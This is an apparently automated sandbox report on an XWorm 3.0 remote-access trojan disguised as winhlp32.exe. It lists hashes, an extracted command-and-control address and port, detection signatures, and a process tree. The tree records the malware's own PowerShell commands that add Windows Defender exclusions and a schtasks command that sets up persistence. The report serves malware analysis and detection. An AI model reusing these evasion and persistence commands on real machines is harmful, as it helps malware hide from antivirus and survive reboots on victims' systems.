Overview
Static analysis: score 10
Behavioral tasks by sample and platform (score in parentheses):
- fr2nnk.exe: windows10-1703-x64 (10), windows7-x64 (10), windows10-2004-x64 (10), windows11-21h2-x64 (10)
- grab.exe: windows10-1703-x64 (10), windows7-x64 (10), windows10-2004-x64 (7), windows11-21h2-x64 (8)
- m2zen.exe: windows10-1703-x64 (8), windows7-x64 (7), windows10-2004-x64 (7), windows11-21h2-x64 (7)
- winhlp32.exe: windows10-1703-x64 (7), windows7-x64 (10), windows10-2004-x64 (10), windows11-21h2-x64 (10)
Analysis (score 10)
- max time kernel: 30s
- max time network: 26s
- platform: windows10-2004_x64
- resource: win10v2004-20240508-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 11-05-2024 09:52
Behavioral tasks (task: sample on resource)
- behavioral1: fr2nnk.exe on win10-20240404-en
- behavioral2: fr2nnk.exe on win7-20240221-en
- behavioral3: fr2nnk.exe on win10v2004-20240226-en
- behavioral4: fr2nnk.exe on win11-20240426-en
- behavioral5: grab.exe on win10-20240404-en
- behavioral6: grab.exe on win7-20240221-en
- behavioral7: grab.exe on win10v2004-20240426-en
- behavioral8: grab.exe on win11-20240508-en
- behavioral9: m2zen.exe on win10-20240404-en
- behavioral10: m2zen.exe on win7-20231129-en
- behavioral11: m2zen.exe on win10v2004-20240508-en
- behavioral12: m2zen.exe on win11-20240508-en
- behavioral13: winhlp32.exe on win10-20240404-en
- behavioral14: winhlp32.exe on win7-20240419-en
- behavioral15: winhlp32.exe on win10v2004-20240508-en
- behavioral16: winhlp32.exe on win11-20240419-en
General
- Target: winhlp32.exe
- Size: 205KB
- MD5: a83dc22ef14c6b5d96aaee00b10a4973
- SHA1: ef84a5e12797487e7a4c1acaa9f783eda6cc77d5
- SHA256: 143e319ba8ca646021e2c90acc56ebb035612146b5c8c128214da52b1386e68d
- SHA512: 0662b2fb69f781f53333c71c3f6abbb581165457662c1f6667568b07828ee4b7b056caaff7dd1c1b857bc4bcf12743eae3489de2be426035498a82bd0caaeccc
- SSDEEP: 6144:y2q1XI3ttUUcmIN1EAr4SeBid/eedR19:lq143cUcB1pzP1Xd
Malware Config
Extracted: xworm 3.0
- 147.185.221.18:41012
- Install_directory: %AppData%
- install_file: Agent.exe
Signatures
Detect Xworm Payload (2 IoCs)
- resource: C:\Windows\System32\x4L.exe, yara_rule: family_xworm
- resource: behavioral15/memory/4976-22-0x0000000000720000-0x0000000000738000-memory.dmp, yara_rule: family_xworm
Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
- PID 2292 created 616: process powershell.EXE, target process winlogon.exe
Command and Scripting Interpreter: PowerShell (1 TTP, 3 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
- pid 2300: powershell.exe
- pid 4944: powershell.exe
- pid 4340: powershell.exe
Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate (wmiprvse.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (wmiprvse.exe)
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
- Key value queried: \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation (winhlp32.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation (x4L.exe)
Drops startup file (2 IoCs)
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4L.lnk (x4L.exe)
- File opened for modification: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4L.lnk (x4L.exe)
Executes dropped EXE (2 IoCs)
- pid 4976: x4L.exe
- pid 3916: x4Shellcode.exe
Adds Run key to start application (2 TTPs, 1 IoC)
- Set value (str): \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x4L = "C:\\Users\\Admin\\AppData\\Roaming\\x4L.exe" (x4L.exe)
Looks up external IP address via web service (1 IoC)
Uses a legitimate IP lookup service to find the infected system's external IP.
- flow 17: ip-api.com
Drops file in System32 directory (9 IoCs)
- File opened for modification: C:\Windows\System32\x4L.exe (winhlp32.exe)
- File opened for modification: C:\Windows\System32\x4Shellcode.exe (winhlp32.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.EXE)
- File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log (powershell.EXE)
- File opened for modification: C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx (svchost.exe)
- File opened for modification: C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx (svchost.exe)
- File opened for modification: C:\Windows\System32\Tasks\x4L (svchost.exe)
- File created: C:\Windows\System32\x4L.exe (winhlp32.exe)
- File created: C:\Windows\System32\x4Shellcode.exe (winhlp32.exe)
Suspicious use of SetThreadContext (1 IoC)
- PID 2292 set thread context of 448: process powershell.EXE, target process dllhost.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
Delays execution with timeout.exe (1 IoC)
- pid 2396: timeout.exe
Enumerates system info in registry (2 TTPs, 1 IoC)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier (wmiprvse.exe)
Modifies data under HKEY_USERS (41 IoCs)
Modifies registry class (1 IoC)
- Set value (int): \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" (sihost.exe)
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Suspicious use of SetWindowsHookEx (2 IoCs)
- pid 3392: Conhost.exe
- pid 4976: x4L.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (tree; depth is the nesting level reported by the sandbox)
- C:\Windows\system32\winlogon.exe (depth 1)
  cmd: winlogon.exe
  - C:\Windows\system32\dwm.exe (depth 2)
    cmd: "dwm.exe"
  - C:\Windows\System32\dllhost.exe (depth 2)
    cmd: C:\Windows\System32\dllhost.exe /Processid:{15070d3f-cde2-4f4c-b6e4-5804705bbf53}
    flags: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
- C:\Windows\system32\lsass.exe (depth 1)
  cmd: C:\Windows\system32\lsass.exe
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- C:\Windows\System32\svchost.exe (depth 1)
  cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- C:\Windows\System32\svchost.exe (depth 1)
  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  flags: Drops file in System32 directory
  - C:\Windows\system32\taskhostw.exe (depth 2)
    cmd: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (depth 2)
    flags: Suspicious use of NtCreateUserProcessOtherParentProcess; Drops file in System32 directory; Suspicious use of SetThreadContext; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
- C:\Windows\System32\svchost.exe (depth 1)
  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
  flags: Drops file in System32 directory
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
- C:\Windows\System32\svchost.exe (depth 1)
  cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
  - C:\Windows\system32\sihost.exe (depth 2)
    cmd: sihost.exe
    flags: Modifies registry class
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
- C:\Windows\System32\svchost.exe (depth 1)
  cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
- C:\Windows\System32\svchost.exe (depth 1)
  cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
- C:\Windows\System32\svchost.exe (depth 1)
  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- C:\Windows\System32\svchost.exe (depth 1)
  cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
- C:\Windows\System32\svchost.exe (depth 1)
  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
- C:\Windows\System32\svchost.exe (depth 1)
  cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
- C:\Windows\System32\spoolsv.exe (depth 1)
  cmd: C:\Windows\System32\spoolsv.exe
- C:\Windows\System32\svchost.exe (depth 1)
  cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
  flags: Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\svchost.exe (depth 1)
  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
  flags: Suspicious use of AdjustPrivilegeToken
- C:\Windows\sysmon.exe (depth 1)
  cmd: C:\Windows\sysmon.exe
- C:\Windows\System32\svchost.exe (depth 1)
  cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
- C:\Windows\system32\wbem\unsecapp.exe (depth 1)
  cmd: C:\Windows\system32\wbem\unsecapp.exe -Embedding
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
- C:\Windows\Explorer.EXE (depth 1)
  cmd: C:\Windows\Explorer.EXE
  flags: Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Local\Temp\winhlp32.exe (depth 2)
    cmd: "C:\Users\Admin\AppData\Local\Temp\winhlp32.exe"
    flags: Checks computer location settings; Drops file in System32 directory; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\x4L.exe (depth 3)
      cmd: "C:\Windows\System32\x4L.exe"
      flags: Checks computer location settings; Drops startup file; Executes dropped EXE; Adds Run key to start application; Suspicious use of AdjustPrivilegeToken; Suspicious use of SetWindowsHookEx
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 4)
        cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\x4L.exe'
        flags: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
        - C:\Windows\System32\Conhost.exe (depth 5)
          cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 4)
        cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4L.exe'
        flags: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
        - C:\Windows\System32\Conhost.exe (depth 5)
          cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 4)
        cmd: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x4L.exe'
        flags: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
        - C:\Windows\System32\Conhost.exe (depth 5)
          cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      - C:\Windows\System32\schtasks.exe (depth 4)
        cmd: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x4L" /tr "C:\Users\Admin\AppData\Roaming\x4L.exe"
        flags: Creates scheduled task(s)
        - C:\Windows\System32\Conhost.exe (depth 5)
          cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          flags: Suspicious use of SetWindowsHookEx
    - C:\Windows\System32\x4Shellcode.exe (depth 3)
      cmd: "C:\Windows\System32\x4Shellcode.exe"
      flags: Executes dropped EXE
    - C:\Windows\system32\cmd.exe (depth 3)
      cmd: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp5DCF.tmp.bat""
      flags: Suspicious use of WriteProcessMemory
      - C:\Windows\System32\Conhost.exe (depth 4)
        cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      - C:\Windows\system32\timeout.exe (depth 4)
        cmd: timeout 3
        flags: Delays execution with timeout.exe
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
- C:\Windows\system32\DllHost.exe (depth 1)
  cmd: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- C:\Windows\System32\RuntimeBroker.exe (depth 1)
  cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\System32\RuntimeBroker.exe (depth 1)
  cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\System32\RuntimeBroker.exe (depth 1)
  cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding
- C:\Windows\system32\SppExtComObj.exe (depth 1)
  cmd: C:\Windows\system32\SppExtComObj.exe -Embedding
- C:\Windows\System32\svchost.exe (depth 1)
  cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
- C:\Windows\System32\svchost.exe (depth 1)
  cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
- C:\Windows\system32\svchost.exe (depth 1)
  cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
- C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe (depth 1)
  cmd: "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
- C:\Windows\system32\DllHost.exe (depth 1)
  cmd: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Enumerates system info in registry

Downloads
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (2KB)
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (944B)
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (944B)
C:\Users\Admin\AppData\Local\Temp\tmp5DCF.tmp.bat (160B)
C:\Windows\System32\x4L.exe (68KB)
C:\Windows\System32\x4Shellcode.exe (164KB)
C:\Windows\Temp\__PSScriptPolicyTest_431fd2ss.jyr.ps1 (60B)